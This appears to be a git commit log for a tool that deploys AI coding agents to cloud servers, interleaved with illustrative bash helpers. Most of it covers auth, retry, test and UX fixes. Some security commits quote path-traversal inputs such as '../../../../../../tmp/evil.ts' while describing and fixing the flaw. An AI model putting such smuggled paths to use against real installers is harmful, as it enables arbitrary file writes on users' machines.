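  while [ "$attempt" -le "$max_attempts" ]; do
    if "$@"; then
      return 0
    fi
    if [ "$attempt" -lt "$max_attempts" ]; then
      sleep "$interval"
    fi
    attempt=$((attempt + 1))
  done
  return 1
}

# Example probe (APP_NAME is a placeholder):
# probe_ssh() { timeout 30 fly ssh console -a "$APP_NAME" -C "echo ok" 2>/dev/null | grep -q ok; }
# poll_until 20 5 probe_ssh || { echo "SSH never became reachable" >&2; exit 1; }
```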
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: run fly ssh console in foreground, not background
fly ssh console breaks when backgrounded with & — it needs a foreground
process to establish the connection. Reverted to foreground execution
and use timeout/gtimeout when available (Linux/CI). On macOS where
timeout isn't available, the user can Ctrl+C hung commands.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: ensure bun PATH is available in non-interactive fly ssh sessions
Ubuntu's default .bashrc returns early for non-interactive shells,
so "source ~/.bashrc && bun install -g openclaw" silently fails —
the PATH line at the bottom of .bashrc is never reached.
Fix by prepending ~/.bun/bin to PATH in run_server() so all remote
commands have access to tools installed during wait_for_cloud_init.
Also fix spawn_agent to explicitly handle agent_install failure
instead of relying on set -e (which exits silently).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fly.io had zero test coverage — every bug fixed this session (stale
tokens, FlyV1 auth, name-taken failures, SSH hangs, PATH issues) went
undetected. This adds the full mock test infrastructure:
- test/fixtures/fly/ — env vars, API assertions, fixture JSONs for
app creation, machine creation, and token validation endpoints
- test/mock-curl-script.sh — URL stripping for api.machines.dev,
body validation for machine creation, synthetic status responses,
app creation POST handler, state tracking
- test/mock.sh — mock fly/flyctl CLI binary (ssh console, auth token),
URL stripping, required field validation, base64 mock
- test/record.sh — Fly.io REST endpoints now recordable, live
create+delete cycle, error detection, auth var mapping
All 15 agent scripts (aider, claude, openclaw, etc.) are automatically
discovered and tested: 75 passed, 0 failed.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: validate saved API tokens before use
Tokens loaded from config files (e.g. ~/.config/spawn/fly.json) were
never validated, so expired or revoked tokens would silently pass through
and only fail at the point of use (e.g. app creation). Now the provider's
test function runs on config-file tokens too, falling through to a fresh
prompt if validation fails.
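The control flow might look like this. `resolve_token` is hypothetical. The validator and prompt functions are supplied by the caller and stand in for each provider's own test and prompt logic.

```bash
#!/usr/bin/env bash
# Use SAVED_TOKEN only if VALIDATE_FN accepts it; otherwise fall through to
# PROMPT_FN for a fresh token.
resolve_token() {
  local saved_token="$1" validate_fn="$2" prompt_fn="$3"
  if [ -n "$saved_token" ] && "$validate_fn" "$saved_token"; then
    printf '%s\n' "$saved_token"
    return 0
  fi
  if [ -n "$saved_token" ]; then
    echo "Saved token failed validation; prompting for a new one." >&2
  fi
  "$prompt_fn"
}
```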
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle FlyV1 token auth scheme for Fly.io Machines API
Fly.io dashboard tokens use the format "FlyV1 fm2_..." where "FlyV1" is
the authorization scheme itself, not a Bearer token prefix. The script was
always sending "Authorization: Bearer FlyV1 fm2_..." which the API rejects
with "token validation error". Now detects FlyV1-prefixed tokens and sends
them as "Authorization: FlyV1 fm2_..." using custom auth headers.
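Here is the header selection as a tiny helper. `fly_auth_header` is a hypothetical name, and the curl line in the comment uses a placeholder app name.

```bash
#!/usr/bin/env bash
# FlyV1 tokens carry their own scheme; everything else is sent as Bearer.
fly_auth_header() {
  local token="$1"
  case "$token" in
    "FlyV1 "*) printf 'Authorization: %s\n' "$token" ;;
    *)         printf 'Authorization: Bearer %s\n' "$token" ;;
  esac
}

# Usage (needs a real token and network; APP_NAME is a placeholder):
# curl -fsS -H "$(fly_auth_header "$FLY_API_TOKEN")" \
#   "https://api.machines.dev/v1/apps/APP_NAME"
```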
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: make refactor service actually run reliably
Three fixes for the refactor workflow that was producing zero PRs:
1. community-coordinator: Gemini → Sonnet — Gemini doesn't support
the Task tool, causing a respawn on every single cycle
2. Monitoring loop: replace "sleep 5" (which drifted to sleep 30)
with explicit short-sleep instructions and CRITICAL rule that
every turn must include a tool call to stay alive
3. Lifecycle management: explicit shutdown sequence with retry,
preventing early exit that orphans teammates
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fixes #1354: users experienced a ~30s delay with "gateway not connected"
errors when trying to use OpenClaw immediately after launch.
Root cause: the gateway takes time to bind to port 18789, but the TUI was
launched after only 2 seconds.
Solution: Add wait_for_openclaw_gateway() helper that polls the gateway
port (max 30s) before launching TUI, ensuring immediate usability.
Changes:
- shared/common.sh: Add wait_for_openclaw_gateway() function
- All openclaw.sh scripts (10 files): Replace sleep 2 with gateway readiness check
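A port-readiness check along these lines can be written without `nc` or `curl`. The sketch uses bash's built-in `/dev/tcp` redirection, which some bash builds disable. `wait_for_port` is a hypothetical name, not necessarily how `wait_for_openclaw_gateway()` is implemented.

```bash
#!/usr/bin/env bash
# Wait up to MAX_SECS for HOST:PORT to accept TCP connections.
wait_for_port() {
  local host="$1" port="$2" max_secs="$3" waited=0
  while [ "$waited" -lt "$max_secs" ]; do
    # Open and immediately close a connection inside a subshell; a refused
    # connection makes the subshell exit non-zero.
    if (exec 3<>"/dev/tcp/${host}/${port}") 2>/dev/null; then
      return 0
    fi
    sleep 1
    waited=$((waited + 1))
  done
  return 1
}

# Example: wait up to 30s for the gateway before starting the TUI.
# wait_for_port 127.0.0.1 18789 30 || echo "gateway not ready after 30s" >&2
```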
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Make install_agent() check exit codes and fail fast when installation
commands return non-zero. Previously, the function would silently
continue even when installations failed due to bash || operators
returning 0.
This fix ensures that installation failures (network timeouts, missing
dependencies, package not found) are caught immediately with actionable
error messages instead of confusing runtime errors during session launch.
Affected ~30 agent scripts using patterns like:
- pip install X 2>/dev/null || pip3 install X
- command -v bun && bun install X || npm install X
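Here is a sketch of a fail-fast wrapper. `run_install_step` and `AGENT_PKG` are hypothetical. Wrapping a fallback chain in its own function lets the wrapper check the chain's combined exit status.

```bash
#!/usr/bin/env bash
# Run an install step; on failure print an actionable message and return
# non-zero instead of letting the script continue.
run_install_step() {
  local description="$1"
  shift
  if ! "$@"; then
    echo "ERROR: failed to install ${description}." >&2
    echo "Check network access and the package name, then retry." >&2
    return 1
  fi
}

# Example with a fallback chain (AGENT_PKG is a placeholder):
# install_agent_pkg() { pip install AGENT_PKG 2>/dev/null || pip3 install AGENT_PKG; }
# run_install_step "AGENT_PKG" install_agent_pkg || exit 1
```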
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes path traversal vulnerability where unvalidated filenames from
GitHub API could write files outside intended directory.
Attack vector: MITM attack or DNS hijacking could inject filenames
like "../../../../../../tmp/evil.ts" to write arbitrary files.
Fix: Validate filenames before download - block "..", "/", and "\\"
to ensure files are written only within ${dest}/cli/src/
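The filename rule can be sketched as a `case` pattern. `is_safe_filename` is a hypothetical name. Rejecting any name that contains `..`, `/`, or `\` keeps every accepted name a single path component under the destination directory.

```bash
#!/usr/bin/env bash
is_safe_filename() {
  case "$1" in
    ''|*..*|*/*|*\\*) return 1 ;;
  esac
  return 0
}

for name in 'commands.ts' '../../../../../../tmp/evil.ts'; do
  if is_safe_filename "$name"; then
    echo "ok: $name"
  else
    echo "skipping unsafe filename: $name" >&2
  fi
done
```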
Severity: HIGH/CRITICAL
Affects: All users running installer via curl|bash
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes #1376 - HIGH severity path traversal in CLI installer
Fixes #1377 - MEDIUM severity unquoted variable in hetzner token extraction
Changes:
- cli/install.sh: Replace string prefix matching with canonicalized path
comparison to prevent path traversal in rm -rf cleanup. The previous
check could be bypassed with sequences like "/tmp/../../home/user".
- hetzner/lib/common.sh: Quote xargs placeholder variable to prevent
unexpected behavior if hcloud context name contains shell metacharacters.
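Below is a sketch of the canonicalized comparison. The helper names are hypothetical. A string prefix test on `/tmp/../../home/user` sees `/tmp/` and passes. Resolving both paths with `pwd -P` first turns that input into `/home/user`, which is then correctly rejected.

```bash
#!/usr/bin/env bash
# Resolve an existing directory to its physical path (symlinks and ..
# removed). CDPATH is cleared so cd never prints or redirects.
canonical_dir() { (CDPATH='' cd -- "$1" 2>/dev/null && pwd -P); }

# Succeeds only if CHILD resolves to a directory strictly inside PARENT.
is_within_dir() {
  local child parent
  child=$(canonical_dir "$1") || return 1
  parent=$(canonical_dir "$2") || return 1
  case "$child" in
    "$parent"/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Example guard before cleanup (paths are placeholders):
# is_within_dir "$dest" "$TMPDIR_ROOT" && rm -rf "$dest"
```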
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: auto-run gcloud auth login on expired GCP tokens
Instead of telling users to run `gcloud auth login` manually, just
run it automatically when auth check fails or instance creation hits
a reauthentication error, then retry.
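A minimal sketch of the "log in and retry once" flow. The helper names are hypothetical. The match on the word "reauthentication" in the command's output is an assumption about gcloud's error text, not something this commit specifies.

```shell
#!/usr/bin/env bash
# Sketch of "re-login and retry once" (helper names are hypothetical).
# Matching "reauthentication" in the output is an assumption about gcloud's error text.

# Kept as a separate function so the flow can be exercised without gcloud.
gcp_login() {
  gcloud auth login
}

run_with_gcp_reauth() {
  local output
  if output="$("$@" 2>&1)"; then
    printf '%s\n' "$output"
    return 0
  fi
  case "$output" in
    *[Rr]eauthentication*)
      printf 'GCP credentials expired, running gcloud auth login...\n' >&2
      gcp_login || return 1
      "$@"  # retry exactly once with fresh credentials
      ;;
    *)
      printf '%s\n' "$output" >&2
      return 1
      ;;
  esac
}
```

Retrying only once avoids an endless login loop if the new credentials are also rejected.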
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: prioritize clouds with CLI installed + hcloud CLI integration
When selecting a cloud provider, clouds are now sorted in 3 tiers:
1. Credentials detected (env vars set) — top priority
2. CLI installed (e.g., gcloud, hcloud, aws) — middle priority
3. Neither — default order
Also adds hcloud CLI-first support for Hetzner operations (server
create/delete/list, SSH key management, auth) with automatic fallback
to the existing REST API when hcloud is not available.
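The three-tier ordering, rendered in shell for illustration. The actual sorting lives in the CLI; the "cloud:cli_binary:ENV_VAR" input format and the function name are hypothetical.

```shell
#!/usr/bin/env bash
# Sketch of 3-tier cloud ordering (input format and names are hypothetical).
# Each argument is "cloud:cli_binary:ENV_VAR". Order within a tier is preserved.
sort_clouds() {
  local tier entry cloud cli env_var t
  for tier in 1 2 3; do
    for entry in "$@"; do
      IFS=: read -r cloud cli env_var <<< "$entry"
      if [ -n "$env_var" ] && [ -n "${!env_var:-}" ]; then
        t=1   # credentials detected in the environment
      elif [ -n "$cli" ] && command -v "$cli" >/dev/null 2>&1; then
        t=2   # provider CLI installed (e.g. gcloud, hcloud, aws)
      else
        t=3   # neither: keep default order
      fi
      if [ "$t" = "$tier" ]; then
        printf '%s\n' "$cloud"
      fi
    done
  done
}
```

For example, `sort_clouds "gcp:gcloud:" "hetzner:hcloud:HCLOUD_TOKEN"` would list hetzner first when HCLOUD_TOKEN is set, even though gcp comes first in the default order.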
Closes #1370
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* refactor: rename aws-lightsail to aws across the project
Simplifies the cloud key from "aws-lightsail" to "aws" — AWS should
have a single entry regardless of the underlying service used.
Renames the directory, updates manifest.json matrix keys, CLI map,
test fixtures, README, and all agent scripts.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: replace open-source models with Gemini Flash and Sonnet in workflows
Drop moonshotai/kimi-k2.5 and Haiku from refactor/security workflows.
Lightweight tasks (triage, issue-checker, community-coordinator) now use
google/gemini-3-flash-preview; all other teammates upgraded to Sonnet.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: ensure CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1 in all workflows
Add the required feature flag export to refactor.sh and security.sh
(discovery.sh already had it). Also update SKILL.md wrapper template
and agent teams reference section to document the requirement.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: persist CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS into .spawnrc
All three service scripts now check for ~/.spawnrc and idempotently
append the agent teams feature flag if missing. This ensures every
Claude session on the VM inherits the flag, not just the one launched
by the service script. Also documents the pattern in SKILL.md.
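A sketch of the idempotent append. The function name is hypothetical. Creating ~/.spawnrc when it is absent is an assumption; the service scripts may only update an existing file.

```shell
#!/usr/bin/env bash
# Sketch of the idempotent .spawnrc update (function name is hypothetical;
# creating the file when absent is an assumption).
ensure_agent_teams_flag() {
  local rc="${1:-$HOME/.spawnrc}"
  local line='export CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1'
  [ -f "$rc" ] || : > "$rc"
  # -x: whole-line match, -F: fixed string, so reruns never duplicate the line.
  if ! grep -qxF "$line" "$rc"; then
    # Avoid gluing the export onto a last line that lacks a trailing newline.
    if [ -s "$rc" ] && [ -n "$(tail -c 1 "$rc")" ]; then
      printf '\n' >> "$rc"
    fi
    printf '%s\n' "$line" >> "$rc"
  fi
}
```

A service script would call `ensure_agent_teams_flag` and also `export CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1` for its own process, so both the current run and later sessions see the flag.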
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: add CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS to qa-cycle.sh
Complete the coverage — qa-cycle.sh now also exports the agent teams
feature flag and persists it to .spawnrc, matching the other three
service scripts.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Extracted EXIT_CODE_GUIDANCE and SIGNAL_GUIDANCE from commands.ts into a
new guidance-data.ts module. This shrinks commands.ts by 100+ lines and
keeps its error handling logic more focused and maintainable.
Changes:
- New file: cli/src/guidance-data.ts (116 lines) with error/signal guidance data
- Refactored: commands.ts now 100 lines shorter, imports guidance data
- Improved: Exit code 1 handling to avoid circular dependency with credentialHints
The extracted module is a pure data file focused on error messages and guidance,
separate from the command execution logic.
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Instead of telling users to run `gcloud auth login` manually, just
run it automatically when auth check fails or instance creation hits
a reauthentication error, then retry.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The result event detection in refactor.sh, discovery.sh, and security.sh
was killing the entire process tree 30s after the team lead's session
ended. In team-based workflows, the team lead's "result" event fires
after spawning teammates — while the actual work is still running as
child processes.
Instead of immediately killing on result detection, monitor the claude
process's child processes via pgrep. While teammates are running, reset
the idle counter to prevent false timeouts. Only shut down once all
teammate processes have completed (or the hard timeout fires).
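A sketch of the child-aware idle check. The function names and defaults are hypothetical; the 30-check idle limit mirrors the 30s window mentioned above. `pgrep -P PID` lists processes whose parent is PID.

```shell
#!/usr/bin/env bash
# Sketch of the child-process-aware idle check (names and defaults are hypothetical).
# pgrep -P PID matches processes whose parent is PID.
has_live_children() {
  pgrep -P "$1" >/dev/null 2>&1
}

# Returns 0 after idle_limit consecutive checks (about one second apart) find
# no children, or 1 if hard_timeout seconds pass first.
wait_for_teammates() {
  local lead_pid="$1" idle_limit="${2:-30}" hard_timeout="${3:-3600}"
  local idle=0 elapsed=0
  while [ "$elapsed" -lt "$hard_timeout" ]; do
    if has_live_children "$lead_pid"; then
      idle=0   # teammates still running: reset the idle counter
    else
      idle=$((idle + 1))
      if [ "$idle" -ge "$idle_limit" ]; then
        return 0
      fi
    fi
    sleep 1
    elapsed=$((elapsed + 1))
  done
  return 1
}
```

Only direct children are checked here; if teammates were grandchildren of the claude process, the check would need to walk the tree.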
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Redirects HOME and XDG dirs to a temp directory before tests run,
preventing any test from accidentally writing to the real user's
home directory (e.g. ~/.claude/settings.json, ~/.zshrc).
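A shell sketch of the isolation step. The real suite may do this in a test preload rather than a shell function, and the function name is hypothetical.

```shell
#!/usr/bin/env bash
# Sketch of test-time HOME isolation (function name is hypothetical).
isolate_home() {
  TEST_HOME="$(mktemp -d)" || return 1
  export HOME="$TEST_HOME"
  export XDG_CONFIG_HOME="$TEST_HOME/.config"
  export XDG_DATA_HOME="$TEST_HOME/.local/share"
  export XDG_CACHE_HOME="$TEST_HOME/.cache"
  export XDG_STATE_HOME="$TEST_HOME/.local/state"
  mkdir -p "$XDG_CONFIG_HOME" "$XDG_DATA_HOME" "$XDG_CACHE_HOME" "$XDG_STATE_HOME"
  # Remove the sandbox when the shell exits (replaces any existing EXIT trap).
  trap 'rm -rf "$TEST_HOME"' EXIT
}
```

Because every path under ~ and the XDG dirs now points into the temp directory, a test that writes ~/.zshrc touches only the sandbox copy.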
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
The tagline claimed "149 combinations" without context, so users might read
it as a limitation or wonder why it isn't 15×10=150. The matrix table shows the
blank cell for local/opencode, but the tagline should explain the gap upfront.
Agent: ux-engineer
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove verbose fields (dropdowns, use cases, environment, proposed UX) from
all issue templates. Humans just need to say what they want; the refactor
team handles enrichment and triage.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Add missing commands to README commands table for consistency with CLI help:
- spawn <cloud> (show available agents)
- spawn list <filter> (filter by agent/cloud name)
- spawn list -a/-c (explicit filters)
- spawn list --clear (clear history)
- spawn last (rerun most recent)
- spawn help (show help)
- spawn version (show version)
Updated descriptions to match CLI help output exactly.
Agent: ux-engineer
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Three reliability improvements:
1. OAuth session cleanup: Verify PID still exists before killing to prevent
accidentally killing unrelated processes if PID is reused by the OS.
Uses kill -0 check before sending SIGTERM.
2. Float arithmetic fallback: Check for python3 availability before using it
for fractional POLL_INTERVAL support. Falls back to integer seconds with
explicit comment about potential early timeout.
3. Exit code preservation: Add clarifying comment about exit code capture
timing in refactor.sh cleanup trap (already correct, now documented).
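A sketch of fixes 1 and 2. The function names are hypothetical. The minimum of 1s in the integer fallback is also an assumption; the commit only says it falls back to integer seconds.

```shell
#!/usr/bin/env bash
# Sketch of two of the fixes above (function names are hypothetical).

# 1. Check that the PID is still alive before signalling it. kill -0 sends no
#    signal; it only tests that the process exists and can be signalled.
safe_kill() {
  local pid="$1"
  [ -n "$pid" ] || return 1
  if kill -0 "$pid" 2>/dev/null; then
    kill -TERM "$pid" 2>/dev/null
  else
    return 1
  fi
}

# 2. Fractional sleep via python3 when available; otherwise whole seconds.
poll_sleep() {
  local interval="$1" whole
  if command -v python3 >/dev/null 2>&1; then
    python3 -c 'import sys, time; time.sleep(float(sys.argv[1]))' "$interval"
  else
    # Integer fallback: drop the fractional part (minimum 1s), so poll timing
    # and any timeout counted in polls become approximate.
    whole="${interval%%.*}"
    case "$whole" in '' | 0) whole=1 ;; esac
    sleep "$whole"
  fi
}
```

The kill -0 check narrows the window in which a reused PID could be signalled, though a process could still exit between the check and the kill.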
Agent: code-health
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes #1197 by checking for saved credentials in ~/.config/spawn/{cloud}.json files.
This prevents false-positive credential warnings when cloud-specific credentials are saved via config files (as done by cloud setup scripts).
Advantages over PR #1288:
- Works with all credential key names (not just api_key/token)
- Handles multi-credential clouds correctly (OVH, Contabo)
- Generic approach checks for any non-empty credential value
Security review: ✅ No vulnerabilities detected
- Path traversal protected
- Safe JSON parsing
- No information disclosure
- Correct multi-cloud credential logic
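A shell rendering of the generic check, for illustration only; the real logic is in the CLI. The function name and the SPAWN_CONFIG_DIR override are hypothetical, and python3 is assumed to be available for JSON parsing.

```shell
#!/usr/bin/env bash
# Sketch of the saved-credential check (function name and SPAWN_CONFIG_DIR
# override are hypothetical). Uses python3 for JSON parsing.
has_saved_credentials() {
  local cloud="$1" file
  # Reject names that could escape the config directory.
  case "$cloud" in '' | *..* | */* | *\\*) return 1 ;; esac
  file="${SPAWN_CONFIG_DIR:-$HOME/.config/spawn}/$cloud.json"
  [ -f "$file" ] || return 1
  python3 - "$file" <<'PY'
import json
import sys

try:
    with open(sys.argv[1]) as f:
        data = json.load(f)
except (OSError, ValueError):
    sys.exit(1)

# Any key counts, not just api_key/token; one non-empty string value is enough.
ok = isinstance(data, dict) and any(
    isinstance(v, str) and v.strip() for v in data.values()
)
sys.exit(0 if ok else 1)
PY
}
```

Checking values instead of specific key names is what lets multi-key configs pass without a per-cloud key list.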
UX improvements:
- Replace outdated cloud references (vultr/linode) with existing clouds (ovh/gcp) in help examples
- Add missing --debug flag to README commands table
- Ensure all documented examples reference clouds that exist in the matrix
These changes prevent user confusion when following examples in help text
and documentation.
Agent: ux-engineer
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>